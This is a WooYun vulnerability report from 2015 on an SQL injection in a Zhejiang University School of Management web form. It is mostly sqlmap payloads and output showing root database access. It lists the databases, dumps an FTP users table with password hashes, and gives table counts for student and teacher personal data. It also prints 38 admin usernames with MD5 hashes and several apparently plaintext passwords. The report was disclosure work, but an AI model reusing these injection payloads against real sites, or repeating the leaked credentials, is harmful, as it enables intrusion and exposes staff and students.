当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154890

漏洞标题:浙江大学管理学院SQL注入,相关多个学院数据库沦陷root权限

相关厂商:浙江大学

漏洞作者: 40huo

提交时间:2015-11-26 22:25

修复时间:2015-12-01 22:26

公开时间:2015-12-01 22:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

post注入
多个数据库沦陷

详细说明:

注入点:
http://**.**.**.**/e/enews/index.php
注入类型:

---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
 
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=


---
[17:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
---


root权限:

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[23:12:08] [INFO] fetching current user
[23:12:08] [INFO] resumed: root@localhost
current user:    'root@localhost'

漏洞证明:

涉及多个学院数据库:

sqlmap identified the following injection point(s) with a total of 1136 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [14]:
[*] ftp
[*] information_schema
[*] mysql
[*] test
[*] usr_zjuemba
[*] zheda
[*] zju_cma
[*] zju_emba
[*] zju_gep
[*] zju_gmc
[*] zju_jcie
[*] zju_niim
[*] zju_som
[*] zju_vote


所有站点ftp账号密码泄露:

Database: ftp
Table: users
[10 entries]
+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+
| id | gid  | uid  | userid      | shell   | passwd        | homedir                   | count   | lastlogin           | lastlogout          |
+----+------+------+-------------+---------+---------------+---------------------------+---------+---------------------+---------------------+
| 1  | 1000 | 1000 | bak         | <blank> | RQdSXtbKHJpQc | /home/bak/                | 1265    | 2015-11-20 06:01:26 | 2015-11-20 06:01:49 |
| 2  | 1000 | 1000 | web         | <blank> | NMeksVb/ZqZlw | /home/www/zju_cma         | 70      | 2015-03-10 11:11:05 | 2015-03-10 11:11:37 |
| 3  | 1000 | 1000 | cbnet       | <blank> | YLOTe6F1B0VLc | /home/www                 | 2162    | 2015-11-10 12:36:55 | 2015-11-10 12:37:18 |
| 4  | 1000 | 1000 | log         | <blank> | Je5h82zwXSj7c | /var/log/httpd            | 24      | 2015-11-20 07:55:58 | 2015-11-20 07:56:22 |
| 5  | 1000 | 1000 | cbnetbak    | <blank> | an9YOUS1jqAIg | /home/bak                 | 9       | 2015-03-06 08:45:06 | 2015-03-06 08:55:56 |
| 6  | 1000 | 1000 | zjusom      | <blank> | in8Cti.VNGf1E | /home/www/zju_som         | 22      | 2015-05-06 12:14:21 | 2015-05-06 12:19:41 |
| 7  | 1000 | 1000 | **.**.**.** | <blank> | v3FedKzdZDlPQ | /home/www/**.**.**.**     | 225     | 2014-10-09 07:33:59 | 2014-10-09 07:38:08 |
| 8  | 1000 | 1000 | lxt         | <blank> | RkH7YkeuqsKkM | /home/www/                | 1186    | 2015-10-15 12:16:46 | 2015-10-15 12:17:48 |
| 9  | 1000 | 1000 | zju_emba    | <blank> | FUx2VZdQyJKcs | /home/www/**.**.**.** | 1074    | 2015-09-10 15:35:31 | 2015-09-10 15:44:18 |
| 11 | 1000 | 1000 | 35year      | <blank> | jNXvBY6A9Nl0A | /home/www/zju_som/35year  | 108     | 2015-07-06 21:12:57 | 2015-07-06 21:22:05 |


数千条学生教师基本信息泄露(包括姓名学号班级专业,家庭住址,简历等):

+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| student_login_log  | 118955  |
| teacher_login_log  | 32051   |
| article            | 23158   |
| admin_log          | 19863   |
| article20110418    | 16533   |
| cma_news           | 13284   |
| admin_login_log    | 10417   |
| meeting            | 7291    |
| student            | 3495    |学生信息表
| student20120306    | 2797    |
| student20110919    | 2470    |
| student20110909    | 2314    |
| student20110331    | 2089    |
| article_baoming    | 1538    |
| zt_xly2011_baoming | 1161    |
| zt_xly2013_baoming | 980     |
| zt_xly2010_baoming | 849     |
| zt_xly2014_baoming | 822     |
| zt_xly2012_baoming | 632     |
| student20121022    | 446     |
| zt_yx2011_baoming  | 396     |
| teacher            | 311     |教师信息表
| article_cate       | 169     |
| base_info          | 88      |
| friends            | 57      |
| dept               | 49      |
| upload_files       | 43      |
| admin_user         | 38      |
| zt_cate            | 22      |
| zt_yx2011_jiabin   | 15      |
| base_cate          | 9       |
| room               | 9       |
| en_index_pic       | 7       |
| friend_cate        | 6       |
| zt_huodong         | 6       |
| gundong            | 5       |
| peiyang            | 4       |
| photo              | 4       |
| teacher_bak        | 4       |
| article_wcate      | 3       |
| faqs               | 3       |
| qa_cate            | 3       |
| class              | 2       |
| zhuanye            | 2       |
| zt_info            | 2       |
| sitemap            | 1       |
+--------------------+---------+


后台管理员账号密码泄露:

Database: zju_som
Table: admin_user
[38 entries]
+------------+----------------------------------+
| username   | password                         |
+------------+----------------------------------+
| xyb        | 1a78e00f947d922875b4fa035a7746e9 |
| lib        | 1b8e2eedc760a5157e1c454882f49d5b |
| gzfh       | 29ca867cfdc823a39185802165ea9ed0 |
| bkssz      | 2d12f9a3e83a401dfa824b9eb91b45d1 |
| hzfh       | 37b0f998f7e024ee253c2927eedd4fe5 |
| cdc        | 3a5e33237a0967d899ff9c0982814a03 |
| card       | 3lzjugk9010192                   |
| kjx        | 4173a1ba1d52a39847eefbd1b61a2e35 |
| zsyjy      | 43f2e1338801e44728f766a80ca9c5e1 |
| amtc       | 4ebf3ac052c754abe7ae8ef057e924bf |
| lab        | 57f1b47bce0d9519ed5ad6314eeff98f |
| rsk        | 6u7cugwa8jl4j7zm                 |
| shfh       | 72c446807f367c2d692eb58058e75c34 |
| hxc        | 81304745cc82d4a40fb1f5101a147859 |
| jykj       | 8731323a909ba0422e0ab67dd6861fe2 |
| rzb        | 8b5f4ffc8f94bddee54520f11063ee1b |
| alzx       | 96e79218965eb72c92a549dd5a330112 |
| bjfh       | a772bf7849c7dc7963b97aba5add09aa |
| yjsjy      | aeee7575b44211014bbdaf4af5dd4f36 |
| zjuc       | b0edbda8f13bf3ad582744f135241670 |
| admin51yfg | b30d46a395ddf29de329feb886939461 |
| zjl        | b3275960d68fda9d831facc0426c3bbc |
| admin36zgf | cd5b42d74fd56bb8604d13f8701ef316 |
| lyx        | da93c5eaf76c613c4032f382809d42a4 |
| szfh       | dc20cd2454dcdafad3f94abc7585e661 |
| kyk        | dm6utkj78j01k9                   |
| gjjl       | dm6utkj78j01k9                   |
| qgx        | e2e425bf9b850789373ee6e608eb4f5a |
| yjssz      | e64d1056f0274a1017766efea59f0ac1 |
| ggx        | f379eaf3c831b04de153469d1bec345e |
| dzb        | f379eaf3c831b04de153469d1bec345e |
| jxx        | f379eaf3c831b04de153469d1bec345e |
| wzfh       | f9f6f822a60a4dd253a21f26de86382b |
| niim       | gbq2dmaq5l0101l4                 |
| gh         | k9r38jx08j3h                     |
| lxd        | l4l443l401l4l43h                 |
| emba       | m7gb21211wgb0paq                 |
| mba        | tk3l3l%@odk9k9                   |
+------------+----------------------------------+


后台可进
怕开除,不搞了,就这样吧。

修复方案:

过滤

版权声明:转载请注明来源 40huo@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-01 22:26

厂商回复:

最新状态:

暂无